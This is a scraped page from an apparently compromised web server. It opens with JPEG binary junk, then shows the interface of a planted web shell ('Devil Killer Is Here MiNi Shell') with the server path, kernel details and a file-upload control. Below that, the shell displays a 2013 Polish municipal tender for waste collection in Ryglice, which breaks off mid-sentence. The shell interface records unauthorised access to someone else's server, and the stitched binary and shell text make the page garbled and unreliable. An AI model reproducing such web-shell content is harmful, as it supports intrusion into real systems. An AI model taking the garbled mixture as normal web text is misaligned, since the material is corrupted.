JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130423/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130423/161452-N-2013.html

<p class="kh_header"><b>Ryglice: Odbieranie, transport i zagospodarowanie stałych odpadów komunalnych niesegregowanych i segregowanych z nieruchomości zamieszkałych na terenie Gminy Ryglice</b><br>
<b>Numer ogłoszenia: 161452 - 2013; data zamieszczenia: 23.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Ryglic , ul. Rynek 9, 33-160 Ryglice, woj. małopolskie, tel. 014 6541035, faks 014 6541054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ryglice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie, transport i zagospodarowanie stałych odpadów komunalnych niesegregowanych i segregowanych z nieruchomości zamieszkałych na terenie Gminy Ryglice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór, transport i zagospodarowanie stałych odpadów komunalnych niesegregowanych i segregowanych z nieruchomości zamieszkałych na terenie Gminy Ryglice, tj.:
-odbiór, transport i zagospodarowanie stałych odpadów komunalnych niesegregowanych (zmieszanych) i segregowanych z nieruchomości zamieszkałych (gospodarstw domowych) na terenie Gminy Ryglice,
-wyposażenie nieruchomości zamieszkałych (gospodarstw domowych) w pojemniki do gromadzenia stałych odpadów komunalnych - dzierżawa pojemników przez Wykonawcę na okres trwania umowy,
-dostarczanie do nieruchomości zamieszkałych (gospodarstw domowych) worków do selektywnej zbiórki stałych odpadów komunalnych.

Przedmiot zamówienia obejmuje odbiór z przed posesji, indywidualnie od każdego gospodarstwa domowego całej masy stałych odpadów komunalnych zarówno niesegregowanych (zmieszanych) jak i gromadzonych w sposób selektywny, transport i zagospodarowanie odebranych odpadów poprzez odzysk lub unieszkodliwianie, w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami, oraz w sposób zapewniający osiągnięcie odpowiednich poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, o czym mowa w ustawie z dnia 13 września 1996 r.o utrzymaniu czystości i porządku w gminach (tekst jednolity: Dz.U. z 2012 r., poz. 391 z późn. zm.).

Zmieszane odpady komunalne i pozostałości z sortowania odpadów komunalnych, przeznaczone do składowania, należy przekazać do regionalnej lub zastępczej regionalnej instalacji przetwarzana odpadów komunalnych, zgodnie z Uchwałą Nr XXV 398 12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012 r. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego, Uchwałą Nr XXVIII 460 12 Sejmiku Województwa Małopolskiego z dnia 29 października 2012 r. w sprawie zmiany Uchwały Nr XXV 398 12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012 r. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego, Uchwałą Nr XXIX 482 12 Sejmiku Województwa Małopolskiego z dnia 26 listopada 2012 r. w sprawie zmiany Uchwały Nr XXV 398 12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012 r. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego oraz Uchwała Nr XXXIII 560 13 Sejmiku Województwa Małopolskiego z dnia 25 lutego 2013 r. w sprawie zmiany Uchwały Nr XXV 398 12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012 r. w sprawie wykonania Planu Gospodarki Odpadami Województwa Małopolskiego.
3.Charakterystyka Gminy Ryglice:
1)Powierzchnia całkowita Gminy Ryglice: 117,00 km kwadratowych.
2)Szacunkowa liczba mieszkańców w Gminie Ryglice: około 11 786 osób.
3)Szacunkowa liczba gospodarstw domowych w Gminie Ryglice, z których odbierane będą stałe odpady komunalne:
Miejscowość i liczba gospodarstw domowych: Ryglice 682, Uniszowa 68, Bistuszowa 146, Joniny 187, Kowalowa 218, Lubcza 410, Wola Lubecka 184, Zalasowa 727. Razem:2 622

UWAGA: Liczba gospodarstw domowych jest orientacyjna. Zamawiający zastrzega sobie prawo zmiany tj. zmniejszenia lub zwiększenia liczby gospodarstw domowych, z których odbierane będą odpady w okresie realizacji zamówienia w granicach od minus 2 procentów do plus 2 procentów.

4.Szacunkowa ilość odpadów przewidziana do zbiórki, transportu i zagospodarowania:
Szacunkowa ilość odpadów przewidziana do zbiórki, transportu i zagospodarowania wynosi 710 Mg w okresie 6 miesięcy, przy czym szacuje się, że stopień segregacji wyniesie około 30 procent, w związku z tym odpady segregowane stanowić będą około 164 Mg, natomiast niesegregowane (zmieszane), pozostałe po segregacji (w tym pieluchy jednorazowe) około 546 Mg.

Ilość wytworzonych stałych odpadów komunalnych na terenie Gminy Ryglice nie jest zależna od Zamawiającego. Ustalone ilości są szacunkowe i mogą ulec zmianie, stosownie do rzeczywistych potrzeb Zamawiającego, uwzględniając ilość wytworzonych stałych odpadów komunalnych przez gospodarstwa domowe. Obowiązkiem Wykonawcy jest odbiór każdej ilości odpadów od gospodarstw domowych objętych przetargiem.
Wykonawcy nie przysługuje prawo dodatkowego wynagrodzenia i lub odszkodowania za osiągnięcie innych wielkości.
Szacunkowa ilość stałych odpadów komunalnych przewidzianych do zbiórki, transportu i zagospodarowania z terenu Gminy Ryglice została ustalona na podstawie analizy ilości zebranych stałych odpadów komunalnych na terenie Gminy Ryglice w latach 2009-2012.
5.Wymagania dotyczące zbiórki stałych odpadów komunalnych:
Zabudowa jednorodzinna:
Zbiórka odpadów komunalnych z gospodarstw domowych w Gminie Ryglice odbywać się będzie systemem workowo-pojemnikowym. 

Pojemniki na kółkach do gromadzenia niesegregowanych (zmieszanych) odpadów komunalnych oraz odpadów pozostałych po segregacji w kolorze czarnym o pojemności 120 l, w ilości jeden pojemnik na jedno gospodarstwo domowe, Wykonawca wydzierżawi gospodarstwom domowym w cenie świadczenia usługi, na czas wykonywania usługi. Obowiązkiem Wykonawcy jest również dostarczanie w cenie świadczonej usługi, kolorowych worków na odpady segregowane zgodnie z przedmiotem zamówienia. W przypadku zgłoszenia przez gospodarstwo domowe zapotrzebowania na pojemniki o większej pojemności niż 120 l w kolorze czarnym na odpady niesegregowane (zmieszane) lub większej ilości pojemników o pojemności 120 l - właściciel nieruchomości (gospodarstwo domowe) zaopatruje się w dodatkowy pojemnik we własnym zakresie.
Wykonawca dostarczy do każdego gospodarstwa domowego do dnia 01 lipca 2013 r. pojemnik lub pojemnik i worki (w przypadku osób prowadzących selektywną zbiórkę stałych odpadów komunalnych), zgodnie z otrzymanym od Zamawiającego wykazem (listą) gospodarstw domowych. Przekazanie pojemników i worków nastąpi poprzez złożenie przez właściciela nieruchomości lub pełnoletnią osobę zamieszkałą na danej nieruchomości czytelnego podpisu wraz z datą, na wykazie (liście) gospodarstw domowych, z których Wykonawca będzie odbierał stałe odpady komunalne w okresie świadczenia usługi. W dniu dostawy pojemników lub pojemników i worków Wykonawca dostarczy do każdego gospodarstwa domowego przekazany mu przez Zamawiającego harmonogram odbioru stałych odpadów komunalnych, instrukcję prowadzenia selektywnej zbiórki stałych odpadów komunalnych tj. wykaz odpadów, które mogą być gromadzone w pojemnikach i workach przeznaczonych do selektywnej zbiórki stałych odpadów komunalnych, oraz odpadów, których wrzucanie jest zabronione, a także informację  o istniejących możliwościach i sposobach uiszczania opłaty za gospodarowanie stałymi odpadami komunalnymi, oraz informację o terminach płatności opłaty za gospodarowanie odpadami komunalnymi.

Pojemnik dostarczony przez Wykonawcę winien być oznakowany napisami określającymi: logo, nazwę, adres i nr telefonu Wykonawcy, oraz powinien spełniać wymogi bezpieczeństwa m. in. być w dobrym stanie technicznym i posiadać szczelną pokrywę. 
W dniu dostawy pojemnika do gospodarstwa domowego, Wykonawca zobowiązany jest do umieszczenia (naklejenia) na wewnętrznej stronie pokrywy pojemnika, otrzymanej od Zamawiającego naklejki z adresem gospodarstwa domowego - nazwą miejscowości (ulicy), nr domu, oraz sposobem gromadzenia i oddawania stałych odpadów komunalnych tj. symbol NS (niesegregowane (zmieszane) stałe odpady komunalne lub symbol PS (pozostałe po segregacji stałe odpady komunalne, w przypadku osób prowadzących selektywną zbiórkę stałych odpadów komunalnych).

Szacunkowa liczba pojemników na kółkach, koloru czarnego o pojemności 120 l, które winien zapewnić (wydzierżawić) Wykonawca: około 2 622 szt.

Liczba pojemników jest szacunkowa i może ulec zmniejszeniu lub zwiększeniu w granicach od minus 2 procentów do plus 2 procentów.

1)Zbiórka niesegregowanych (zmieszanych) stałych odpadów komunalnych - kod 20 03 01 oraz odpadów pozostałych po segregacji (w przypadku osób prowadzących selektywną zbiórkę stałych odpadów komunalnych):
-odpady gromadzone będą w pojemnikach na kółkach, koloru czarnego o pojemności 120 l,
-pojemniki zabezpiecza (dzierżawi) Wykonawca,
-częstotliwość odbioru i wywozu przez Wykonawcę - 2 razy w miesiącu (zgodnie z  harmonogramem wywozu),
-miejsce ich wystawienia do załadunku i odbioru - przed każdą nieruchomością (gospodarstwem domowym) lub w innym miejscu uzgodnionym z wytwórcą odpadów,
-realizacja reklamacji (nieodebrane z nieruchomości odpady zgodnie z harmonogramem) -  w przeciągu 24 godzin od otrzymania zawiadomienia fax lub email od Zamawiającego. Załatwienie reklamacji należy niezwłocznie potwierdzić - faksem nr 14 654 10 54 lub email: komunalny@ryglice.pl, 
-Wykonawca zobowiązuje się do zagospodarowania całej masy odebranych niesegregowanych  (zmieszanych) stałych odpadów komunalnych oraz odpadów pozostałych po segregacji, zgodnie z przepisami obowiązującego prawa w tym zakresie, oraz przedstawienia Zamawiającemu 1 raz w miesiącu dowodów potwierdzających wykonanie tych czynności (tj. karty przekazania odpadów).
2)Zbiórka odpadów kuchennych ulegających biodegradacji - kod 20 01 08:
-w przypadku osób prowadzących selektywną zbiórkę stałych odpadów komunalnych, odpady kuchenne ulegające biodegradacji gromadzone będą w workach o pojemności 80 l, w kolorze brązowym,
-worki do odbioru odpadów ulegających biodegradacji (dla gospodarstw domowych przystępujących do zbiórki, na wymianę oraz w ramach reklamacji) zapewnia Wykonawca, w cenie świadczonej usługi,
-miejsce ich wystawienia do załadunku i odbioru - przed każdą nieruchomością (gospodarstwem domowym) lub w innym miejscu uzgodnionym z wytwórcą odpadów,
-częstotliwość odbioru i wywozu przez Wykonawcę - 2 razy w miesiącu (zgodnie z  harmonogramem wywozu).
-Wykonawca zobowiązuje się do zagospodarowania całej masy odebranych stałych odpadów komunalnych ulegających biodegradacji poprzez przekazanie ich do odzysku zgodnie z przepisami obowiązującego prawa w tym zakresie, oraz przedstawienie Zamawiającemu 1 raz w miesiącu dowodów potwierdzających wykonanie tych czynności ( tj. karty przekazania odpadów),
-Wykonawca zobowiązuje się do uzupełnienia na własny koszt właścicielom nieruchomości worków do zbierania odpadów ulegających biodegradacji po każdorazowym odbiorze, poprzez pozostawienie na nieruchomości nowych pustych worków w dniu odbioru, w ilości odpowiadającej liczbie odebranych worków,
3)Zbiórka selektywnie zbieranych stałych odpadów komunalnych tj.: opakowania z papieru i tektury - kod 15 01 01, papier i tektura - kod 20 01 01, opakowania ze szkła - kod 15 01 07, szkło - kod 20 01 02, odzież - kod 20 01 10, opakowania z tekstyliów - kod 15 01 09, tekstylia - kod 20 01 11, opakowania z tworzyw sztucznych - kod 15 01 02, tworzywa sztuczne - kod 20 01 39, opakowania z metali - kod 15 01 04, metale - kod 20 01 40, opakowania wielomateriałowe - kod 15 01 05 następować będzie do worków.
A.Wprowadza się 5 rodzaje worków niezbędnych do prowadzenie selektywnej zbiórki wyżej wymienionych stałych odpadów komunalnych:
-niebieski o pojemności 120 l - przeznaczony na papier, tekturę, tekstylia, odzież,
-biały o pojemności 80 l - przeznaczony na szkło bezbarwne i kolorowe,
-żółty o pojemności 120 l - przeznaczony na tworzywa sztuczne, metale, 
-brązowy o pojemności 80 l - przeznaczony na odpady kuchenne ulegające biodegradacji,
-pomarańczowy o pojemności 80 l - przeznaczony na pieluchy jednorazowe.
B.Worki winny posiadać następujące nadruki:
-worek niebieski: PAPIER, TEKSTYLIA i nazwa Wykonawcy,
-worek biały: SZKŁO i nazwa Wykonawcy,
-worek żółty: TWORZYWA SZTUCZNE, METALE i nazwa Wykonawcy, 
-worek brązowy: ODPADY KUCHENNE BIODEGRADOWALNE i nazwa Wykonawcy,
-worek pomarańczowy: PIELUCHY JEDNORAZOWE i nazwa Wykonawcy.
C.Charakterystyka worków do selektywnej zbiórki stałych odpadów komunalnych:
-materiał - folia polietylenowa LDPE,
-grubość - min. 60 mikronów,
-pojemność: 120 l - worek koloru: niebieskiego, żółtego, 80 l - worek koloru: białego, brązowego, pomarańczowego. 
D.Worki do selektywnej zbiórki stałych odpadów komunalnych (dla gospodarstw domowych przystępujących do selektywnej zbiórki, na wymianę oraz w ramach reklamacji) zapewnia Wykonawca, w cenie świadczonej usługi.
E.Wykonawca zobowiązuje się do:
-uzupełniania na własny koszt właścicielom nieruchomości worków do selektywnego zbierania stałych odpadów komunalnych po każdorazowym odbiorze, poprzez pozostawienie przy wejściu na nieruchomość nowych pustych worków w dniu odbioru selektywnie zebranych stałych odpadów komunalnych, w ilości odpowiadającej liczbie odebranych worków,
-zagospodarowania całej masy selektywnie zebranych odpadów poprzez przekazanie ich do odzysku zgodnie z przepisami obowiązującego prawa w tym zakresie, oraz przedstawienie Zamawiającemu 1 raz w miesiącu dowodów potwierdzających wykonanie tych czynności (tj. karty przekazania odpadów).
F.Częstotliwość załadunku i wywozu przez Wykonawcę odpadów zebranych selektywnie:
- 1 raz w miesiącu worki koloru: niebieskiego, białego, żółtego w terminach ustalonych  w harmonogramie opracowanym wspólnie przez Zamawiającego i Wykonawcę,
- 2 razy w miesiącu worki koloru: brązowego, pomarańczowego w terminach ustalonych w harmonogramie opracowanym wspólnie przez Zamawiającego i Wykonawcę.
G.Miejsce wystawienia stałych odpadów komunalnych zebranych selektywnie do załadunku i odbioru - przed każdą nieruchomością (gospodarstwem domowym) lub w innym miejscu uzgodnionym z wytwórcą odpadów.
Budynek mieszkalny wielorodzinny - Dom Nauczyciela:
Zbiórka stałych odpadów komunalnych z 8 lokali mieszkalnych (zamieszkałych przez 32 osoby) - gospodarstw domowych, w budynku mieszkalnym wielorodzinnym - Dom Nauczyciela w miejscowości Zalasowa, odbywać się będzie systemem workowo - pojemnikowym. Wszyscy mieszkańcy Domu Nauczyciela będą prowadzić selektywną zbiórkę stałych odpadów komunalnych. 

Wykonawca wydzierżawi w cenie świadczenia usługi - na czas wykonywania usługi, mieszkańcom budynku wielorodzinnego w miejscowości Zalasowa jeden pojemnik plastikowy w kolorze czarnym na czterech kółkach o pojemności 1100 litrów na odpady pozostałe po segregacji, oraz 3 kolorowe pojemniki typu dzwon o pojemności 1 500 l do selektywnej zbiórki stałych odpadów komunalnych. 

Odpady komunalne pozostałe po segregacji odbierane będą dwa razy w miesiącu, natomiast stałe odpady komunalne zbierane w sposób selektywny w pojemnikach typu dzwon, odbierane będę od mieszkańców Domu Nauczyciela w miejscowości Zalasowa jeden raz w miesiącu, w terminach odbioru stałych odpadów komunalnych od mieszkańców zabudowy jednorodzinnej.

Wykonawca w dniu odbioru stałych odpadów komunalnych sprawdzi losowo, lecz nie mniej niż 5 na 100 gospodarstw domowych - szczegółowo, odpady selektywne pod kątem rzetelności segregacji odpadów przez mieszkańców. W przypadku stwierdzenia nieprawidłowej segregacji, Wykonawca dokona odbioru odpadów, po czym niezwłocznie zawiadomi Zamawiającego.

Ponadto, Zamawiający wymaga dostarczenia do siedziby Zamawiającego do dnia 26.06.2013 r. worków, o kolorach i w ilościach niżej wymienionych:niebieski - 400 szt.,
biały - 700 szt., żółty - 800 szt., brązowy - 200 szt., pomarańczowy - 350 szt.
6.Standardy sanitarne dotyczące wykonywania zamówienia:
Wykonawca zobowiązany jest do realizacji zamówienia uwzględniając zapisy Ustawy z dnia 14 grudnia 2012 r. o odpadach, Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122), Rozporządzenia Ministra Środowiska z dnia 16 czerwca 2009 r. w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi (Dz. U. z 2009 r., Nr 109, poz. 868).

7. Obowiązki dotyczące prowadzenia dokumentacji związanej z realizacją zamówienia:
A.Wykonawca będzie zobowiązany do dostarczania Zamawiającemu w wersji papierowej i  elektronicznej sprawozdań kwartalnych o jakich mowa w art. 9n Ustawy z dnia 16 września 1996 r. o utrzymaniu czystości i porządku w gminach. Sprawozdania powinny być sporządzone zgodnie z Rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami (Dz. U. z 2012 r., poz. 630), a w przypadku zmiany rozporządzenia, zgodnie z obowiązującymi wzorami druków.
Powyższe sprawozdanie należy przekazać Burmistrzowi Gminy Ryglice w terminie do końca miesiąca po upływie kwartału, którego dotyczy za wyjątkiem IV kwartału 2013 r., za który sprawozdanie należy złożyć do 15 stycznia 2014 r.,
B.W celu umożliwieniu sporządzenia przez Zamawiającego rocznego sprawozdania z realizacji zadań z zakresu gospodarowania odpadami komunalnymi, o których mowa w art. 9q ustawy, Wykonawca zobowiązany będzie przekazać Zamawiającemu niezbędne informacje umożliwiające sporządzenie sprawozdania. Wykonawca zobowiązany będzie również do przedkładania Zamawiającemu innych informacji dotyczących odbioru, unieszkodliwiania i segregacji odpadów, jeśli w trakcie realizacji zamówienia na Zamawiającego nałożony zostanie obowiązek sporządzania innych sprawozdań z zakresu gospodarki odpadami. Dotyczy to tylko informacji, w posiadaniu których będzie Wykonawca, a nie Zamawiający,
C.Wykonawca zobowiązany będzie do przekazywania Zamawiającemu kart przekazania odpadów do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych bądź innej jednostki do odbioru odpadów selektywnie zebranych zgodnie z obowiązującymi wzorami, o jakich mowa w Rozporządzeniu Ministra Środowiska z 8 grudnia 2010 r. w sprawie wzorów stosowanych na potrzeby ewidencji i odpadów (Dz. U. z 2010 r., Nr 249, poz. 1673), Rozporządzeniu Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie zakresu informacji oraz wzorów formularzy służących do sporządzania i przekazywania zbiorczych danych o odpadach (Dz. U. z 2010 r., Nr 249, poz. 1674),
D.Podstawą do miesięcznego rozliczenia usługi i wystawienia faktury VAT będzie pisemny raport wykonania usługi sporządzony przez Wykonawcę i zatwierdzony przez Zamawiającego, o którym mowa w Rozdziale III, pkt 6, ust. 27.
E.Ilość poszczególnych rodzajów odpadów wykazanych na kartach przekazania odpadów, o których mowa w pkt D, powinna odpowiadać ilości wynikającej z raportu wykonania usługi za odpowiedni okres rozliczeniowy.
8. Baza magazynowa - transportowa:
Wyposażenie bazy magazynowo - transportowej winno spełniać następujące warunki:
1)teren bazy magazynowo - transportowej winien być zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym;
2)miejsca przeznaczone do parkowania pojazdów zabezpieczone przed emisją zanieczyszczeń do gruntu;
3)miejsca magazynowania selektywnie zebranych odpadów komunalnych zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych;
4)teren bazy magazynowo-transportowej wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001 r. - Prawo wodne (Dz. U. z 2012 r. poz. 145, 951 i 1513 oraz z 2013 r., poz. 21);
5)baza magazynowo-transportowa winna być wyposażona w: 
A.miejsca przeznaczone do parkowania pojazdów,
B.pomieszczenie socjalne dla pracowników odpowiadające liczbie zatrudnionych osób
C.miejsca do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych
D.legalizowaną samochodową wagę najazdową - w przypadku, gdy na terenie bazy następuje magazynowanie odpadów;
6)Na terenie bazy magazynowo - transportowej powinny znajdować się także:
A.punkt bieżącej konserwacji i napraw pojazdów,
B.miejsce do mycia i dezynfekcji pojazdów, 
o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo-transportowej;
7)Część transportowa oraz część magazynowa bazy mogą znajdować się na oddzielnych terenach, przy jednoczesnym spełnieniu wyżej wymienionych warunków;
8) Na terenie bazy magazynowo-transportowej będą znajdować się urządzenia do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc przetwarzania.
9. Wizja lokalna:
Zaleca się dokonanie wizji lokalnej - zapoznanie z warunkami terenowymi, w miejscu realizacji przedmiotu zamówienia.
10.Szczegółowy zakres rzeczowy przedmiotu zamówienia oraz sposób wykonania określony jest w załącznikach do SIWZ, tj.: wzorze umowy oraz Regulaminie utrzymania czystości  i porządku na terenie Gminy Ryglice..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.00.00-5, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.51.40.00-3, 90.53.30.00-2, 34.92.84.80-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.W niniejszym postępowaniu Zamawiający żąda wniesienia wadium, przed upływem terminu składania ofert, w wysokości: 8 000,00 zł (słownie : osiem tysięcy złotych). 
2.Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Pzp.
3.Wadium wnoszone w pieniądzu należy wpłacić przelewem na wskazany rachunek bankowy Zamawiającego - Gmina Ryglice: 67 85890006 0050 0000 0084 0002. W tytule przelewu należy podać: Wadium do przetargu ZP.271.6.2013. 
4.W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
5.Wadium wnoszone w formie niepieniężnej należy zdeponować w oryginale w Kasie Urzędu, a do oferty załączyć uwierzytelnioną kopię dokumentu wadialnego. 
6.Zwrot i zatrzymanie wadium będzie następować na zasadach określonych w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli Wykonawca udokumentuje posiadanie:
